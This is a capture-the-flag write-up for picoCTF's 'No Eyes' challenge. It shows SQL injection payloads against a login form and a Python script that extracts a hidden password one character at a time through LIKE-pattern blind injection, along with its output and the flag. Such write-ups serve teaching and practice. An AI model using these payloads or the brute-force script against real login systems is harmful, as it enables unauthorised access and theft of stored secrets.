[Go back](./Readme.md)

### No Eyes - 125 points

The presented webpage isn't really interesting as it only contains a form. Inputting a random string in the username box gives an "User Not Found." error. If the username is "admin" and the password is a random string, the error changes to "Incorrect Password.". The password field is vulnerable to SQL injection, as inputting an apostrophe shows this error:

```
There Was An Error With Your Request
select * from users where pass = ''';
```

Trying something like `' or 1=1;--` returns this message:

```
Login Functionality Not Complete. Flag is 63 characters
```

The flag isn't literally "63 characters", but can be guessed character by character using SQL pattern matching. Using `' or pass like '%';--` tests if the password matches `%`, which is a multiple character wildcard. This will result in a success and the return message won't be "Incorrect Password". By using a pattern such as 'a%' we can test to see if the password begins with 'a'. I wrote this script to bruteforce the login system:

```py
import requests

possible_chars =  "1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_!@#$^&*()+="
best_guess = ""

while len(best_guess) < 63:
	for c in possible_chars:
        guess = best_guess + c
		r = requests.post("http://shell2017.picoctf.com:16012/", data = {"username": "admin", "password": "' or pass like '{}%';--".format(guess)})
		if "63 characters" in r.text:	# Good guess
			best_guess = guess
			break
	print(best_guess)

```

This started very slowly outputting this:

```
$ python noeyes.py
N
NO
NOT
NOT_
```

I stopped it there as it was too slow and decided to reorder the `possible_chars` to:

```
possible_chars =  "ABCDEFGHIJKLMNOPQRSTUVWXYZ_1234567890abcdefghijklmnopqrstuvwxyz!@#$^&*()+="
```

because it seemed like the password is an alphabetic + underscore string. The "slowness" is due to me not being able to get async requests working and stepping down to using the `requests` lib which only provides synchronous requests.

Letting it run for a while it got to `NOT_ALL_ERRORS_SHOULD_BE_SHOWN_`, but the next guessed chars were all underscores. This is because in SQL pattern matching an underscore is a wildcard for a single character and the underscore was matching before the digits of the unique flag suffix. This was fixed by changing the `possible_chars` to contain the underscore after the digits. To save some time, I now initialised the `best_guess` variable to `NOT_ALL_ERRORS_SHOULD_BE_SHOWN_`.

```
$ python noeyes.py
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_5
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_59
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599B
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BF
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4E
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE4
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE41
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE419
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE4197
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE4197F
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE4197FD
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE4197FDC
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE4197FDC5
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE4197FDC5E
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE4197FDC5ED
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE4197FDC5ED9
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE4197FDC5ED93
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE4197FDC5ED936
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE4197FDC5ED9361
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE4197FDC5ED93612
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE4197FDC5ED93612A
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE4197FDC5ED93612A9
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE4197FDC5ED93612A9C
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE4197FDC5ED93612A9C4
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE4197FDC5ED93612A9C4F
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE4197FDC5ED93612A9C4F5
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE4197FDC5ED93612A9C4F51
NOT_ALL_ERRORS_SHOULD_BE_SHOWN_599BFC4EE4197FDC5ED93612A9C4F515
```

The last line is the flag.
